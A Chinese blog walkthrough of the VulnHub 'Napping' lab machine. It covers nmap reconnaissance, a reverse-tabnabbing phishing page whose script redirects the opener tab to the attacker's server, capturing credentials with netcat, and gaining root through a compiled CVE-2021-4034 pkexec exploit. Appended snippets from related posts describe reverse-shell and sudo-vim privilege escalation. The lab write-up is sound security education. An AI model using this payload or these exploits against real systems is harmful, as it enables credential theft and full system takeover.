Vulnhub_Napping

最新推荐文章于 2024-06-05 19:00:00 发布
最新推荐文章于 2024-06-05 19:00:00 发布
阅读量3.3k 收藏
点赞数
文章标签: linux java python 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/122916931
版权

d588a764d647c10967b17cd9fe6244fd.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.76
napping:192.168.31.47

信息收集

使用Nmap探测目标主机发现开放22、80两个端口

nmap -A -p- 192.168.31.47

9be2e5bd6d2943cc6b7360811db57d66.png
访问80端口发现是一个登录页和一个注册页
b5bb416530fbceb03a885322785fba5b.png
b62af5a67843dbfbd94b8b7cb6a08003.png
查看这两个网页的源码没有发现有价值的信息
a5cd7f4aed628acdb91514b6ab19a046.png
f4a2c22a107164db6fabda241fb42625.png
尝试注册一个账户,登录后发现存在一个输入框
7ad9cbfb3d8a8d34081d0550bd396714.png
输入后会生成一个超链接点击会进行跳转
7099740e22da55f885968b0b87bf5c2d.png
根据网页的描述,在输入一个网址之后,管理员会进行审核,且这种生成的URL容易存在tabnabbing攻击
6119d45c6d08e3b10c37806e2aff0ddb.png

漏洞利用

首先从真网站下载一个网页

wget http://192.168.31.47/index.php

ee15d65c32dfc00cb021ad9f9ab5a4eb.png
然后再创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html)

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
</script>
</body>
</html>

然后在网页目录下使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口,在正常网页中填写构造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码
ba76e946232e4af6891d2a9f24d9410c.png
使用这个密码登录web界面,发现密码错误
264108aa9d092544528d86b6ce244cd2.png
然后尝试ssh登录,发现可以登录成功
b6238c940c02a26de957e353a957c4d7.png
查看daniel用户的家目录没有发现有用的信息
e9a622e6045ccaf5f3409167b2b67ed3.png
然后查看adrian用户家目录下存在三个文件
53d0af15dbd548d69e06f96bb9a7490e.png
第一个是判断网站是否正常启动,并打印时间
fcd9fbfc8b3b31ceabf7a27df65216c0.png
这个文件为query.py脚本执行写入的log文件
90c6f71757daaae026264714624e7e4c.png
查看user.txt发现没有权限
8182a69e8a7e228188f9f7215a1c3a0d.png

提权

查看系统版本分析该网站可能存在CVE-2021-4034 polkit的pkexec本地权限提升漏洞
8c2a044f0499b53b18bfca0b5ee079e2.png
然后查看gcc是否存在和版本号
c9683b2f7f22e4ab5507357928785240.png
将cve-2021-4034漏洞的poc下载到服务器后,使用gcc进行编译
680fa475f15d09f6d068c2bd2369638f.png
查看编译后文件
704b5408bf0eae803c7bf2c86ef263fb.png
执行编译文件获得root权限
b1cee22796104479112b9a8e204d8e5b.png
查看flag
b444fa19042ca03a2c75133c7375fc06.png

加入我的星球

38f73dc42696c3cab7891c1b0a265ffd.png

下方查看历史文章

859edc229c1a3d8d74cbb2516e05f9ab.png

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

2e6fbb83983c76fc4c6035bb2567d9c9.png

NowSec
关注
Reverse Tabnabbing漏洞的理解和利用
墨痕诉清风的博客
10-11 43
恶意链接: 攻击者创建一个看似正常的网站或链接,并诱导用户点击。标签切换: 当用户点击链接并在新标签页中打开页面后,攻击者使用 JavaScript 修改该标签页的内容。伪装: 攻击者通过改变网页的外观,使其看起来像用户之前访问过的合法网站(例如银行、社交媒体等)。信息收集: 用户在不知情的情况下输入敏感信息(如用户名和密码),这些信息被攻击者获取。tabnabbing是一种钓鱼攻击漏洞,网上将该漏洞翻译为反向标签劫持攻击,大致原理就是黑客。
Matlab:正则表达式中的标文
希望我的博客,能帮上你解决学习中工作中所遇到的问题
11-16 182
Matlab:正则表达式中的标文
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1699
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1254
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
Vulnhub项目:NAPPING: 1.0.1
Ays.Ie的博客
05-07 793
Vulnhub项目:NAPPING: 1.0.1
4-vulnhub靶场,napping
qq_49078152的博客
08-21 437
vulnhub靶场,napping,vim提权,2>/dev/null过滤
vulnhub靶场6:napping
Genarior的专栏
05-16 213
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来...
napping-player:适用于 Android 平板电脑的视频播放器,可进行“小睡”实验
06-29
打盹儿 这是一款适用于 Android 平板电脑的视频播放器,可以进行“小睡”实验。 什么是午睡实验? 来自 Nestrud、Michael A. 和 Harry T.... “从 MFA 和 MDS 的小睡数据中恢复子采样维度和配置。...
Vulnhub靶场:NAPPING: 1.0.1
最新发布
weixin_69670995的博客
06-05 1316
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
VulnHub-Napping打靶记录
qq_43534481的博客
08-24 333
Vulnhub Napping靶场 详细通关记录。
Vulnhub靶场】Napping 1.0.1
Nailaoyyds的博客
06-15 987
查看开启端口和服务,登录框可以从弱密码、注册口,子目录,注入等手段入手。 注册账号试试水 登录后发现有跳转点,可以跳转到输入的链接。 先看一下正常链接,发现是可以执行的 利用恶意链接 直接用kali访问该页面。 监听到账号密码 query.py这个py文件是可以执行的,可以在里边写入反弹shell。建立shell文件,导入py文件中执行。文件差不多两分钟自动执行一次。 给shell.sh文件权限。..................
Vulnhub靶场】NAPPING: 1.0.1
DG_s1mple
04-01 6269
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
Napping
Forever_Han13的博客
03-26 714
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CST Nmap scan report for 192.168.0.1 Host is up (0.00040s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
vulnhub靶机Napping1.0.1教程
m0_73248913的博客
07-18 354
vulnhub靶场
VulnHub靶场之FoxHole: 1.0.1
A_dmin的博客
10-09 1226
VulnHub靶场之FoxHole: 1.0.1 扫描IP以及端口: 访问web页面,扫描一下目录: 有个phpmyadmin,去看看,只是一张图片,,我透: 继续看看robots.txt,得到一个secret.html,访问,看不懂: 发现还有个admin.html,查看一下,得到提示: Maybe take a nice *deep* look at that one purple fox picture? I dunno. 查看一下images,一堆图片,,,发现有三张紫狐的图片: 图
1、VulnHub(基础准备)
weixin_43850732的博客
06-24 299
1、vulnhub基础准备扫描靶机IPNmapArp-scanNetdiscover开启简易HTTP服务python方式php方式 扫描靶机IP 默认在导入靶机镜像后是不知道靶机IP地址的,第一步是扫描发现到靶机的IP地址。 Nmap ping 扫描 nmap -sP 192.168.100.1/24 no ping 扫描 nmap -nP 192.168.100.1/24 Arp-scan arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批
Oracle连接管理-如何限制ip访问Oracle数据库
oradbm的博客
09-03 1766
一、概述 本文将给大家介绍如何限制某个ip或某个ip段才能访问Oracle数据库 1.通过sqlnet.ora 2.通过/etc/hosts.deny和/etc/hosts.allow 3.通过iptables 二、正式实验 本次实验环境是Centos6.10 + Oracle 11.2.0.4单实例,数据库服务器ip地址为192.168.31.71 通过sqlnet.ora a. 关闭数据库服务器上的防火墙,修改sqlnet.ora文件 该文件放在$ORACLE_HOME/network/admin下
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值